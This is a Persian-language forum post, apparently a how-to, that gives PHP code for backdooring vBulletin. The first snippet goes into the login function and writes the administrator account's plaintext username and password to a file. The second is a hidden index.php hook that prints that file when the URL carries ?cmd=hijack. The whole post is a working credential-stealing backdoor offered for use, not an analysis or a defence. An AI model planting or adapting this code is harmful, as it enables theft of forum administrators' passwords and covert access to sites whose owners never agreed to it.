با سلام
از اسمش معلمومه که چه کاربردی داره....

برای اینکار اول کد زیر رو داخل فایل functions_login.php که در مسیر includes/ قرار داره قرار بدید.

[php]
if ($vbulletin->userinfo['userid'] == "1")
{
$hj = $username . ":". $password;
$myFile = "/Your File Address.txt";
$fh = fopen($myFile, 'w') or die("can't open file");
$stringData = $hj;
fwrite($fh, $stringData);
fclose($fh);
} [/php]
دقت کنید که این کد رو در این قسمت قرار بدید

[php]
function verify_authentication($username, $password, $md5password, $md5password_utf, $cookieuser, $send_cookies)
{
global $vbulletin;

$username = strip_blank_ascii($username, ' ');
if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
//Insert Hijack Code Here
if (
$vbulletin->userinfo['password'] != iif($password AND !$md5password, md5(md5($password) . $vbulletin->userinfo['salt']), '') AND
$vbulletin->userinfo['password'] != iif($md5password, md5($md5password . $vbulletin->userinfo['salt']), '') AND
$vbulletin->userinfo['password'] != iif($md5password_utf, md5($md5password_utf . $vbulletin->userinfo['salt']), '')
)
{ [/php]

بعد از اون کد زیر رو داخل یکی از فایل های php بزارید که بتونید از طریق url اونو بخونید برای مثال index.php

[php]
<?php
if ($_GET['cmd']=='hijack')
{
include('/Your File Address.txt');
die('');
}
?> [/php]

و در پایان هم پسورد ها اینجا ذخیره میشن....

[php]index.php?cmd=hijack[/php]